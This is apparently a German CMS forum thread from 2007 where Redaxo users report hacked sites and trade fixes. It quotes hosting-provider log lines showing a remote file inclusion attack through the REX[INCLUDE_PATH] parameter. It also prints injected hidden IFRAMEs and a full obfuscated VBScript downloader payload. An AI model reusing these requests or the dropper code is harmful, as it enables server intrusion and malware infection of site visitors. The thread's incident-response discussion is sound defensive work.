Redaxo gehackt?

[_DSP_]

Hallo, wir haben heute morgen folgende Email erhaltem. Erst haben wir sie für normalen Spam gehalten, sind der Sache aber dennoch nachgegangen und siehe da: Es war kein Spam:

Betreff: C81403328 Crackversuch ueber xxxxxx.de

Sehr geehrter Herr,

wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

Es handelt sich um das Script
"/redaxo/include/addons/image_resize/pages/index.inc.php", welches über
den Parameter "REX[INCLUDE_PATH]" die Ausführung beliebigen Codes
erlaubt.

83.170.96.156 - - [12/Sep/2007:19:56:33 +0200] "GET
/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH
]=http://usuarios.arnet.com.ar/larry123/morgan.txt? HTTP/1.1" 200 213
www.xxxxxxxxx.de "-" "Mozilla/3.0 (compatible; Indy Library)" "-"

Bitte beachten Sie, dass einige Ihrer Dateien mittels eines IFRAME
trojanisiert wurden. Bei Besuchern Ihrer Seiten, die unsichere
Webbrowser verwenden, soll so Schadcode installiert werden. Aus diesem
Grund empfehlen wir Ihnen, Ihre Dateien zu entfernen und von sicherer
Quelle erneut Hochzuladen.

Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
oder Foren des Herstellers. Insbesondere gilt dies auch für die
Komponenten von Drittherstellern der verwendeten Applikationen. Diese
sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
Software verzeichnet sind. Verwenden Sie lediglich Programme aus
vertrauenswürdigen Quellen.

Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender
Artikel ebenfalls von Interesse für Sie sein:
http://hilfe-center.1und1.de/server/roo ... ity/4.html

--
Mit freundlichen Grüßen,

Ingvar Gilbert
1&1 WebHosting

1&1 Internet AG
Brauerstraße 48
76135 Karlsruhe

Und siehe da, ein kurzer Blick in den Quelltext der Seite hat klargemacht dass es kein Spam war. Da stand doch tatsächlich ganz unten nach dem schliessenden </html>-tag folgendes drin:

Code: Alles auswählen

<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

inhalt der iframe war dann folgendes:

Code: Alles auswählen

<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

--></SCRIPT>

wir sind mit keinem PC drauf gegangen, war uns doch etwas suspekt, am mac jedoch hats wohl ncihts gemacht und wir konnten uns das mal anschauen.

es lag ncoh eine "php.ini" in addons/image_resize/pages/php.ini die hat da wohl auch nciht hingehört. löschen ging, runterladen aber nciht, um zu schauen was da drin war. ich hab von allem mal einen screenshot gemacht und den quelltext behalten.

kann uns jemand sagen, was oder wer das war? Wir sind bisher nochnie "gehackt" worden und nun ein wenig aufgeregt bzw verunsichert
.
danke schonmal

[Andreas.Eberhard]

Hallo,

sieht so aus als ob die .htacces im Verzeichnis redaxo/include gefehlt hat!

[_DSP_]

Hallo,

sieht so aus als ob die .htacces im Verzeichnis redaxo/include gefehlt hat!

ne, die war drin, ich hab alles im redaxo verzeichnis so gelassen.

da wir keine real url addon verwenden können (1und1) hab ich an der htaccess auch nix gemacht...

[Markus.Staab]

Hi,

die von aberhard genannte Redaxo Datei hat nichts mit Url Rewrite zu tun.

Es gibt 2x .htaccess Dateien.

Eine auf der gleichen Ebene wie der REDAXO Ordner und eine im REDAXO Ordner.

Die im REDAXO Ordner ist die entscheidende... Damit solche Fehler nicht mehr passieren haben wir in der neuen R3.3 dahingehend eine Fehlerprüfung eingebaut..

Gruß,
Markus

[_DSP_]

Hi,

die von aberhard genannte Redaxo Datei hat nichts mit Url Rewrite zu tun.

Es gibt 2x .htaccess Dateien.

Eine auf der gleichen Ebene wie der REDAXO Ordner und eine im REDAXO Ordner.

Die im REDAXO Ordner ist die entscheidende... Damit solche Fehler nicht mehr passieren haben wir in der neuen R3.3 dahingehend eine Fehlerprüfung eingebaut..

Gruß,
Markus

ja, das hab ich direkt nach meinem letzten beitrag auch gemerkt, aber an der htaccess im include ordner hab ich auch nichts gemacht, vorhanden war sie allerdings.

[Markus.Staab]

Hi,

evtl veraltete PHP/Apache Version?

Gruß,
Markus

[_DSP_]

Hi,

evtl veraltete PHP/Apache Version?

Gruß,
Markus

1und1 webspace...

phpinfo() sagt mir das hier:

SERVER_SOFTWARE Apache/1.3.33 (Unix)

[_DSP_]

So, jetzt ist alles wieder gefixt.

Hat jemand ne Ahung, wie sowas passieren kann, bzw was man machen kann dass sowas nicht socheinmal passiert?

[Andreas.Eberhard]

So, jetzt ist alles wieder gefixt.

und wie gefixt!?

[_DSP_]

So, jetzt ist alles wieder gefixt.

und wie gefixt!?

naja, die datenbank war nicht betroffen, sondern "nur" die dateien auf dem ftp-server. also, alle dateien plattgemacht, ftp passwort & benutzer geändert, datenbank passwort & benutzer geändert, redaxo samt templates mit der noch vorhandenen Datenbank installiert, und drauf geachtet dass die oben erwähnte htaccess auch wirklich im ordner redaxo/include liegt.

Soweit hat das funktioniert, die ominösen iframes sind verschwunden. Jetzt heissts warten und hoffen dass es nicht nochmal vorkommt!

[Koala]

Hat jemand ne Ahung, wie sowas passieren kann, bzw was man machen kann dass sowas nicht socheinmal passiert?

Die Doku lesen: E. Sicherheit
Den Forenbereich Neuigkeiten beachten und gelegentlich auch mal im Bereich Download vorbeischaun.

[mb@WIT]

Die Seite eines unserer Kunden wurde ebenfalls "gehackt"..
Gleiches Problem wie beim vorherigen Poster, jedoch diesmal über das Stats Addon. In der Zwischenzeit hatte der Hoster den Webspace gesperrt so das keine Einsicht der Daten möglich war. Jedoch sind wir uns zu 100% sicher das beide .htaccess vorhanden waren und funktioniert haben. Rechte waren so niedrig wie möglich gesetzt die index.inc.php hatte 644. Einzig diverse Ordner die Schreibrechte erfordern hatten höhere CHMOD-angaben (z.b. files, include/addons/stats/logs).

Wie kann so etwas generell passieren? Anbei Auschnitt der Mail..

Code: Alles auswählen

Es handelt sich um das Script
"/redaxo/include/addons/stats/*/index.inc.php", welches über den
Parameter "REX[INCLUDE_PATH]" die Ausführung beliebigen Codes erlaubt.
84.220.88.80 - - [23/Nov/2007:21:11:37 +0100] "GET
//redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=http
://inimigo.t35.com/read.txt???? HTTP/1.1" 200 32961
www.xxx.de "-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; InfoPath.2)" "-"
84.220.88.80 - - [23/Nov/2007:21:12:21 +0100] "POST
//redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=http
://inimigo.t35.com/read.txt???? HTTP/1.1" 200 32573
www.xxx.de"http://www.xxx.de//redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=http://inimigo.t35.com/read.txt????"
"Mozilla/4.0 (compatible; MSIE 

[mb@WIT]

Hat jemand ne Ahung, wie sowas passieren kann, bzw was man machen kann dass sowas nicht socheinmal passiert?

Die Doku lesen: E. Sicherheit

Wird nicht viel bringen da man in einem reinen Webhostpaket nicht viel an den php Einstellungen rumspielen kann. Wenn hier eine Fehleinstellung vorliegt dann Seitens des Hosters.

[Markus.Staab]

Hi,

diese .htaccess Dateien sind keine Garantie ob der Server sicher ist.
Es darf nicht möglich sein, eine Datei die innerhalb des include Ordners liegt, direkt via Browser aufzurufen (Der Webserver muss hier eine Fehlermeldung bringen und den Zugriff verweigern)

Im Setup der 4.x Version wird das abgeprüft.

Viele Grüße,
Markus

[mb@WIT]

hi kills,

danke für die Info. Habe eben wieder Zugriff vom Hoster bekommen. Dort hat dubioserweise tatsächlich die .htaccess gefehlt. Habe das System sauber neu aufgespielt und gesichert. Jetzt geht der Exploit nicht mehr.

Nun habe ich sämtliche Kunden auf den Exploit überprüft. Zum Glück war das scheinbar bis auf einen, eine Ausnahme - dort bekomme ich Fehlermeldungen ergo zieht der Schutz der .htaccess nicht. Meine erste Vermutung es handle sich hierbei um einen Windows Server war falsch.

Scheinbar wird dort, warum auch immer die .htaccess ignoriert. Evtl falsche Einträge in der php.ini.

Grüße
Mattias

[Koala]

Scheinbar wird dort, warum auch immer die .htaccess ignoriert. Evtl falsche Einträge in der php.ini.

Die .htaccess hat garnichts mit PHP zu tun; das ist eine reine Webserversache (Apache)!

[mb@WIT]

...

Die .htaccess hat garnichts mit PHP zu tun; das ist eine reine Webserversache (Apache)!

Danke für den Hinweis, bleibt mir wohl nichts anderes über als mich direkt an den Hoster zu wenden.

Gruß